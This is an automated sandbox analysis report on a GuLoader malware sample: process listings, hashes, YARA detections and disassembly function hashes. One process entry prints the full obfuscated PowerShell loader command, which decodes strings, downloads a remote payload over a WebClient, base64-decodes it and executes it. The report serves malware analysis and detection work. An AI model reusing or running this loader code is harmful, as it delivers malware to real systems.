(Tilbageholdte 'Ra$ cgLil aoStbm a DlBa:Unl CuOvfVbtDuaScn,egSur e UbSesRe i= F C [EkS yT.sFitSleVamAf.DiCBeo Un vF.e MrRytW ]Un:Fe:D FTor aoP,m,eBK,aThs Cepl6Pl4.rSdit TrW,iSunuogS (,k$ iSBatWrr aGriHenS s B)');Containeriseringers (Tilbageholdte 'On$ AgEvLFoOTrbHea lSu: eT nS,oPlm ,A BNIrI oa,a El= S N [.rS oyCos itStEEvMMi.,rT peunXBlT f.n ECaN c Go ADScISpN.ogPi]In:H.:Spa Rs CCStiOciEm.IngdiEIsTI sSutParAniklnReGun(Uf$OvLPruVoF AtAmapanTaGYarNge ibIdS ,)');Containeriseringers (Tilbageholdte ' I$ OGUnlPaOTibA a AlEk:F a ocHaOOpRS N ,S.k= S$KieRun ,O SM,pa Ln II ha s.MosS,UReb SVatBaRVai Dn Ug,a(Mo$ oaGaG,rr OEMuE.is , B$S U nkuAHan SaStLS y LTDeiFoCB,)');Containeriseringers $Acorns;"
                                                    Imagebase:0x7ff788560000
                                                    File size:452'608 bytes
                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000003.00000002.1874103061.0000021AA9260000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:4
                                                    Start time:13:26:57
                                                    Start date:08/12/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff7699e0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:6
                                                    Start time:13:27:11
                                                    Start date:08/12/2024
                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Polars229='Afkvistning158';;$Navier='kompetencegivende';;$Ndudgangen9='semipreserved';;$Straalepletten='Knaldgassen';;$Forhales=$host.Name;function Tilbageholdte($Satirisation){If ($Forhales) {$Nonanarchically=2} for ($Jurywoman=$Nonanarchically;;$Jurywoman+=3){if(!$Satirisation[$Jurywoman]){cls;break }$Halomancy+=$Satirisation[$Jurywoman];$Hiveward='Schweizerostens'}$Halomancy}function Containeriseringers($Taltes213){ .($Murage) ($Taltes213)}$Plagen=Tilbageholdte ' SNRee gt c. Uw';$Plagen+=Tilbageholdte ' ae aB.lC.ulE i EeSiN at';$Moonscape=Tilbageholdte 'B,MCoo,tz,hi Sl,al Cao /';$elegiker=Tilbageholdte ' aT TlFlsto1Fo2';$Ungeneral='Ar[T.npuEM TM .BiSDuE rFeV ITrc oEPaP.poNaISunIstS.MRiAAmNBua nGHaESdr M]Kn:So:StsC eSeCFaU yr aI utA,y RpAlrMaoU t OKoCKootaL,u=Pe$ eEB.lS eFlg OiOmK BeBir';$Moonscape+=Tilbageholdte 'Mo5Gu. u0La G( LW viKrnT d oKawCosVi O.NHeTRe i1Ae0 r.Ap0Sl;st ,eW Si .nH 6Bo4Dr; u ,ix i6 H4O,;Ke Lur RvA :Pi1L 3Fo1Va.Bu0Ab) d ,GBae cDekHao /tr2Va0Re1E.0an0 M1As0Ne1 L TiFSei MrNeeSef CoDrx o/R 1Cy3 T1.o.So0';$Retransform=Tilbageholdte ' FUT sC,eTeris-skA ag,eeRen Ct';$Automatteoriens=Tilbageholdte 'RuhSath.tSpp jsE :Qu/ e/T w Tw OwKr. vfVitGasMae n gKriS nTreSte rL.sTr. Ac RoT.mF /RekSpmG./RemLyimecNarP.oHocOvhTheDri SlReiW a L.Sid Kw.rp Q> jh lt It.opEvsFo:hy/ e/N w CwSkwfu. opAfu bn eS.e itfa.Tra eesl/HykRumGa/ vmE,iHuc CrSmoG cDrh .e HiPalK iWaaC,. rd w op';$Sterne=Tilbageholdte 'Bi>';$Murage=Tilbageholdte 'BeiEaEFrX';$Svejsemestre='Teddybjrnenes';$Groteskes='\bethink.Sal';Containeriseringers (Tilbageholdte 'K.$FogUdl iO.eBRoA,mlk,:SeeCaN HERiB rrH rChi SCuEDiNAleH SSa=Af$ .EflnTrv I: Fa uPAnp D.eAMet aKr+S,$Kng cR,doK tRuE oSReK E.as');Containeriseringers (Tilbageholdte 'Sc$Ovg .LTho ,b EAVrlSa:VilUnA,nGRer CI.rn.pg SsArFBlO TRS M .3Re7Go=E $ .A.juFlt O oM hA eTLaT.oeThoc R PiSpeFoN rS A.KlsN pUnL ri STHo(Sl$PesJeT EArRG N yEMu)');Containeriseringers (Tilbageholdte $Ungeneral);$Automatteoriens=$Lagringsform37[0];$Bygders=(Tilbageholdte ' P$brgT lS O Sb.uAC L : PbAmIS,RSkGBoiSpTQuTH iHjN MERarFrE BnSks .=F.NFieF wSt-SmoPeBGyj BeHocK,T US.nyJoSStt GER M K.l $Sap DlBiaL.g eCoN');Containeriseringers ($Bygders);Containeriseringers (Tilbageholdte '.o$PrBPeiCorD gPri FtJ.t .i Sn heSorEreannKus i.OrHudeAraMid,eeRarKosCa[Po$StRHeeG.tSar Oa,inSrsShfK.oF rPrmS ]Fa=Gr$JeMSto EoOvnPas,dcKua gpSie');$Netmave=Tilbageholdte ' S$ .BGoiF.rReg,ai at Dt si ,nn e MrS eHjns,s . .DBooFlwB nudl OoLraPedcaFB itrlc e H(Dr$AaA au NtProUnmSeaMittotS eDioKor iReeAnnA,sri, $ VIHunMadDioIrpAth yeOrnUni CnEp)';$Indophenin=$Enebrrisenes;Containeriseringers (Tilbageholdte 'T $,nGM.lstOFeB cA.oL E:InI dnFuGGoET f MR DM iAB.RSpmCoEf LAfaB DGeE o= F(.yt Ee aSBat f-AtP,aa ,t ah i y$UnI KnChd .O ,pUnHUdE ,n Ki ,nBe)');while (!$Ingefrmarmelade) {Containeriseringers (Tilbageholdte ' e$ ig slBuoBrbSpa AlBl:M DfieDonNonLoiUnsBusmo=Se$FoTreoA k.eo tmTrpUmoT.nPaeBenVktEne es') ;Containeriseringers $Netmave;Containeriseringers (Tilbageholdte ' ,sSaTFaaAvRUftTi- s gl.aEPeeBiPPl oo4');Containeriseringers (Tilbageholdte 'Ud$ aGRiL .oNabTyA olAn:BeI NnUrGd Eb f eR SMVgA prB mutE,el,oa DDiEB =K.(G TOmESkSbrt .- apBrA iTQuh , ,$ dIslN BDVao rpLyhOxeP nw iPln u)') ;Containeriseringers (Tilbageholdte 'F.$AfgPelCloL bSpaS,LE :LoFP,oBor HfA jU,ETir SDG iGuNS,GAce arBa=Gr$JyG olCooA b .ALvLM : oPWao SI GnFiTD,w.eaG yStS ,+ X+ e%I $HoLPra GG dRM iPoN uGTes.rF WO hrunMB 3 l7Wo.UnC lOKnUUfn Kt') ;$Automatteoriens=$Lagringsform37[$Forfjerdinger]}$Agrees=317274;$Unanalytic=28672;Containeriseringers (Tilbageholdte 'W $GaGStlTeo rbMyA.il n:,dS atPrRVeA AIEjnDiS . Un=,c TgFeEC T c-,oC TO,aN,aTSeeToN .TYa Ve$PaIFiN PDTrO UpS H ESknHyIEnN');Containeriseringers (Tilbageholdte 'Ra$ cgLil aoStbm a DlBa:Unl CuOvfVbtDuaScn,egSur e UbSesRe i= F C [EkS yT.sFitSleVamAf.DiCBeo Un vF.e MrRytW ]Un:Fe:D FTor aoP,m,eBK,aThs Cepl6Pl4.rSdit TrW,iSunuogS (,k$ iSBatWrr aGriHenS s B)');Containeriseringers (Tilbageholdte 'On$ AgEvLFoOTrbHea lSu: eT nS,oPlm ,A BNIrI oa,a El= S N [.rS oyCos itStEEvMMi.,rT peunXBlT f.n ECaN c Go ADScISpN.ogPi]In:H.:Spa Rs CCStiOciEm.IngdiEIsTI sSutParAniklnReGun(Uf$OvLPruVoF AtAmapanTaGYarNge ibIdS ,)');Containeriseringers (Tilbageholdte ' I$ OGUnlPaOTibA a AlEk:F a ocHaOOpRS N ,S.k= S$KieRun ,O SM,pa Ln II ha s.MosS,UReb SVatBaRVai Dn Ug,a(Mo$ oaGaG,rr OEMuE.is , B$S U nkuAHan SaStLS y LTDeiFoCB,)');Containeriseringers $Acorns;"
                                                    Imagebase:0x60000
                                                    File size:433'152 bytes
                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000006.00000002.2982475542.0000000005748000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:high
                                                    Has exited:false

                                                    General

                                                    Target ID:7
                                                    Start time:13:27:11
                                                    Start date:08/12/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff7699e0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:false

                                                    Disassembly

                                                    Reset < >

                                                      Executed Functions

                                                      Function 00007FFD9BAAAB26 Relevance: .5, Instructions: 474COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1884112712.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ffd9baa0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b552ab1fea6030b9ad273d3623fcc4ae4fab8c9a7021c58d362351870d60228c
                                                      • Instruction ID: f7202299b5312db663ccac49dc295d1ee76f8bc352efa9cbdc90046fc26e08ac
                                                      • Opcode Fuzzy Hash: b552ab1fea6030b9ad273d3623fcc4ae4fab8c9a7021c58d362351870d60228c
                                                      • Instruction Fuzzy Hash: EBF1C530A09A8E8FEBB8DF28C8557E977D2FF54310F04426EE84DC72A5DB7499458B81
                                                      Function 00007FFD9BAAB8D2 Relevance: .5, Instructions: 460COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1884112712.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ffd9baa0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 65e9f5526f542cc2f3802443630ea0ac00509c647846a521583d870f255dd411
                                                      • Instruction ID: dfc87d44774cfc6d8acf0219a5e7c2fc70ac7c5c9b5e48ab2c1951794574bab0
                                                      • Opcode Fuzzy Hash: 65e9f5526f542cc2f3802443630ea0ac00509c647846a521583d870f255dd411
                                                      • Instruction Fuzzy Hash: 74E1C530A09A4E8FEBA8DF28C8657E977D1FF54310F44426EE84DC72A5DF7899418B81
                                                      Function 00007FFD9BAAD445 Relevance: .8, Instructions: 792COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1884112712.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ffd9baa0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b2c6e0bef1e57aaec0f934cdc98aeb7ca55d6765e1085d5ec01f3ca27bc1a467
                                                      • Instruction ID: a0a4dd5f409974d6ed5b475a260cad9ab6064c133cc6ff35fc597c3be96282b2
                                                      • Opcode Fuzzy Hash: b2c6e0bef1e57aaec0f934cdc98aeb7ca55d6765e1085d5ec01f3ca27bc1a467
                                                      • Instruction Fuzzy Hash: 89F1A531A08A4D8FDF98DF5CC4A4AAD7BE2FF68314F15016AE48DD7295CA74E841CB81
                                                      Function 00007FFD9BB7BD75 Relevance: .6, Instructions: 588COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1884628386.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ffd9bb70000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7f5fb8ff837149cb27e13baa93cb514148343d19e998fba26fbaec97c1f6804a
                                                      • Instruction ID: ccbb7430567dee327493dcfa7b5ce4e567a79ed7b1fab5da02a57d77bebfc79f
                                                      • Opcode Fuzzy Hash: 7f5fb8ff837149cb27e13baa93cb514148343d19e998fba26fbaec97c1f6804a
                                                      • Instruction Fuzzy Hash: 39022921B0EB894FE7B6867888B11647BD1FF56214B1A01FFC08DCB5E3DE19AD068781
                                                      Function 00007FFD9BB7C287 Relevance: .5, Instructions: 549COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1884628386.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ffd9bb70000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d7a3cc6de8b00376c26e74706631c8eda72c3513b7f95fbf66775e5ea4da9d24
                                                      • Instruction ID: 682ed72a3f106e31fa049db17fa0f23835249606330d9183c8921f26fef06ce2
                                                      • Opcode Fuzzy Hash: d7a3cc6de8b00376c26e74706631c8eda72c3513b7f95fbf66775e5ea4da9d24
                                                      • Instruction Fuzzy Hash: E2F14921B0EB890FE7A6D76C88A56B47BE0EF56314B1A01FFD08DCB5E3D919AC058341
                                                      Function 00007FFD9BB76229 Relevance: .5, Instructions: 504COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1884628386.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ffd9bb70000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cae0729109dc6fffaa5f94e6a530c7c9ae4060517c5059937c57c7c08b1ceb15
                                                      • Instruction ID: f6ebc5a05bfd546ca86c63efc3025e5713a3ddf367ee2a254d3e950d295c2e1a
                                                      • Opcode Fuzzy Hash: cae0729109dc6fffaa5f94e6a530c7c9ae4060517c5059937c57c7c08b1ceb15
                                                      • Instruction Fuzzy Hash: C5E10962A0FBCA0FE7A6966848B65747FE1FF52214B1A01FFD09EC74E3D918A905C341
                                                      Function 00007FFD9BB7CE24 Relevance: .5, Instructions: 454COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1884628386.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ffd9bb70000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ca2eccf495cb43a4c2bd80eb1c43e3726ac0655239d7d8123b6fa62a0ff5d18f
                                                      • Instruction ID: 71a0086e3d46de7bab06db1771edd61abcd7f6e91981aca46a45aa21a798ceef
                                                      • Opcode Fuzzy Hash: ca2eccf495cb43a4c2bd80eb1c43e3726ac0655239d7d8123b6fa62a0ff5d18f
                                                      • Instruction Fuzzy Hash: 9FD14662B0EB8D0FE7A6DA6888A45747BE1EF56254B0901FFD04CCB5E3DA19AD05C381
                                                      Function 00007FFD9BB7C7D5 Relevance: .4, Instructions: 388COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1884628386.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ffd9bb70000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 880e313918369171e0d9335d27990f18e39032b2b988905db9938b924b27f4da
                                                      • Instruction ID: c24c1d245af1f9d86ba360e29b5af2bcb33a64ee401840a00e2fc8e0d60a220c
                                                      • Opcode Fuzzy Hash: 880e313918369171e0d9335d27990f18e39032b2b988905db9938b924b27f4da
                                                      • Instruction Fuzzy Hash: 7FC15962B0EB891FE7A5EA6888A51A87BE1FF55224F1900FED05CC75E3DE18AC45C341
                                                      Function 00007FFD9BB772BD Relevance: .4, Instructions: 373COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1884628386.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ffd9bb70000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cf038fe19e00d68e49348320cbb6835749bd917cfc4247ee7f14183ed964a8e2
                                                      • Instruction ID: e29301f159f2cb18016de4c0b4d12dfbcd2b50ebdd5384cc34d5bd004987e499
                                                      • Opcode Fuzzy Hash: cf038fe19e00d68e49348320cbb6835749bd917cfc4247ee7f14183ed964a8e2
                                                      • Instruction Fuzzy Hash: 5AB13723B0EA8E0FEBA6976948B45747BE1FF56318B1A01FBD45DC75E3D918AC018381
                                                      Function 00007FFD9BAAB4E6 Relevance: .3, Instructions: 333COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1884112712.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ffd9baa0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 821c0a5238460cf98733f9b8d3ae59a75f7df50b30359bebf3d4a440bf697977
                                                      • Instruction ID: 8d597067f494df96f1c96adadcefeec307a6f8824ec42397221b1d76d70fa746
                                                      • Opcode Fuzzy Hash: 821c0a5238460cf98733f9b8d3ae59a75f7df50b30359bebf3d4a440bf697977
                                                      • Instruction Fuzzy Hash: DAB1E83060DA8D4FEB68DF28C8557E93BD1FF59310F44426EE84DC72A2DA74A945CB82
                                                      Function 00007FFD9BB7BDDC Relevance: .3, Instructions: 267COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1884628386.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ffd9bb70000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f47c8c88a474f476ecb93a0dedad346046bed0ecdbfdd4eae2377de66f1df6ee
                                                      • Instruction ID: 6dc5490c73a9ed70a83df630bbb0fbfd930654c1d1c5745c0248f06b6d00bbc2
                                                      • Opcode Fuzzy Hash: f47c8c88a474f476ecb93a0dedad346046bed0ecdbfdd4eae2377de66f1df6ee
                                                      • Instruction Fuzzy Hash: 16811432B0AA4E4FE7F48A6888B567477D1FF94318B16017ED05DC7AE2DE24ED018AC1
                                                      Function 00007FFD9BB7D8B8 Relevance: .2, Instructions: 150COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1884628386.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ffd9bb70000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7fb59c527b2a1704a6211642a89c0f6641e4c1260ccfc6419cc44108e6c1fd11
                                                      • Instruction ID: 330652ada3e1e3551e9f9469c8fc70330c89e05e88cf820cbf03bd767c6e46bd
                                                      • Opcode Fuzzy Hash: 7fb59c527b2a1704a6211642a89c0f6641e4c1260ccfc6419cc44108e6c1fd11
                                                      • Instruction Fuzzy Hash: EA410772B0EA8D4FEBA5EEA844A46A877E1FF94354B0501BBD45DC75E3DA14AC04C341
                                                      Function 00007FFD9BB773E2 Relevance: .1, Instructions: 114COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1884628386.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ffd9bb70000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0698834b0c6f94917f0ffdb30c63124ff6a36144404f3cc0de5c655ad5f80438
                                                      • Instruction ID: 0e546d42d5c47489842d2bdedc153180d720162a3fba2c6f7a4dde5a5edbd226
                                                      • Opcode Fuzzy Hash: 0698834b0c6f94917f0ffdb30c63124ff6a36144404f3cc0de5c655ad5f80438
                                                      • Instruction Fuzzy Hash: E5310423F1FA8A0BE7B696A918B55787AC0FF11328B6A01BAD55DC35E3DD086C014241
                                                      Function 00007FFD9BB763B4 Relevance: .1, Instructions: 100COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1884628386.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ffd9bb70000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d9200416bf4fcaee84c1757128f18536913710848ba0733188976b60947cd6d7
                                                      • Instruction ID: 03d8af8051c6d44e94cb561888e704118a88461a02fda65b2a204526cce6126d
                                                      • Opcode Fuzzy Hash: d9200416bf4fcaee84c1757128f18536913710848ba0733188976b60947cd6d7
                                                      • Instruction Fuzzy Hash: 31212022F0FA4E0FE7B99A6C08B517465C2FF5535875A01BED05EC75E3DD19EC418241
                                                      Function 00007FFD9BAAAFE4 Relevance: .1, Instructions: 92COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1884112712.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ffd9baa0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d145d0be3dbb39f875fa6e0ea39195a3812844e4c3de3f32138daf3fcc0d64c7
                                                      • Instruction ID: 7f05b1a7bc642a735906f3854ad4a790db8e82bb1f53672a82f6448c357758a6
                                                      • Opcode Fuzzy Hash: d145d0be3dbb39f875fa6e0ea39195a3812844e4c3de3f32138daf3fcc0d64c7
                                                      • Instruction Fuzzy Hash: CC318330A1964DDEFBB89F54CC6AFF93292FF41318F810139D41D860E2CA792A45CB61
                                                      Function 00007FFD9BB7121F Relevance: .1, Instructions: 83COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1884628386.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ffd9bb70000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e8df017e8c281c758e9bea735ca032e92348e150b1d19806a7301af9df7738f7
                                                      • Instruction ID: a08ac5b5c8ca839a9fefb6bb0e5bd3bf93022094b550a4a468eb689b4cbb66c0
                                                      • Opcode Fuzzy Hash: e8df017e8c281c758e9bea735ca032e92348e150b1d19806a7301af9df7738f7
                                                      • Instruction Fuzzy Hash: DD21D353E0FACA0FE7A1A67808F51642BD1EF66654B1940FFD09DC71E3DC18A8098322
                                                      Function 00007FFD9BB7CA3F Relevance: .1, Instructions: 59COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1884628386.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ffd9bb70000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3adcf0c3cd541e6b4ab4aff2fca9910c35c9362794e3eb45d4be0229f3158b78
                                                      • Instruction ID: d53b6a3f846075767c5e2f7ce384323f313402f175cdddefcfb90913982a57d7
                                                      • Opcode Fuzzy Hash: 3adcf0c3cd541e6b4ab4aff2fca9910c35c9362794e3eb45d4be0229f3158b78
                                                      • Instruction Fuzzy Hash: FF119832A0E7C94FD765E65888A61ACBBE1FF55224F1401FED09D870E7DA292D448742
                                                      Function 00007FFD9BB7D6AF Relevance: .1, Instructions: 59COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1884628386.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ffd9bb70000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ba3e03a935698ea8eb4392a3624e5567d2486e46fd772439603206463a8c17b2
                                                      • Instruction ID: 997ecf97e51629763ab9798f51968673e1dd8383677b151b538d8db7c09bc036
                                                      • Opcode Fuzzy Hash: ba3e03a935698ea8eb4392a3624e5567d2486e46fd772439603206463a8c17b2
                                                      • Instruction Fuzzy Hash: B311C473A0E7C90FE765EB5848A61ACBBB1FF56224F1501FED09D870E3DA186D448741
                                                      Function 00007FFD9BB7DEBF Relevance: .1, Instructions: 59COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1884628386.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ffd9bb70000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b0baac643a1421b9d01540e9ba22c222a3e619b6dcb8557dbc438f73501d3b29
                                                      • Instruction ID: abefbdcee614e51c1b3a9bea3c96b5777e3aadcbbe428a38ac3e38db2b77945a
                                                      • Opcode Fuzzy Hash: b0baac643a1421b9d01540e9ba22c222a3e619b6dcb8557dbc438f73501d3b29
                                                      • Instruction Fuzzy Hash: 3E11C472B0E7C90FE766A65848A61ACBBA1FF52224F0501FED09C8B0E3DA192D448791
                                                      Function 00007FFD9BAA3945 Relevance: .0, Instructions: 49COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1884112712.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ffd9baa0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                      • Instruction ID: bdda0109228a190c12742b9e7315728e2f6bb354b6803920c3f62299af715007
                                                      • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                      • Instruction Fuzzy Hash: 9D01677121CB0C4FD748EF0CE451AA5B7E0FF95364F10056DE58AC76A5D636E881CB45

                                                      Executed Functions

                                                      Function 06D50647 Relevance: 19.7, Strings: 15, Instructions: 966COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2987626670.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_6d50000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
                                                      • API String ID: 0-1861941731
                                                      • Opcode ID: b2767ee04c8d930612e45cc6bdedb3a1302ae151af963961c6f7d7d27045a1be
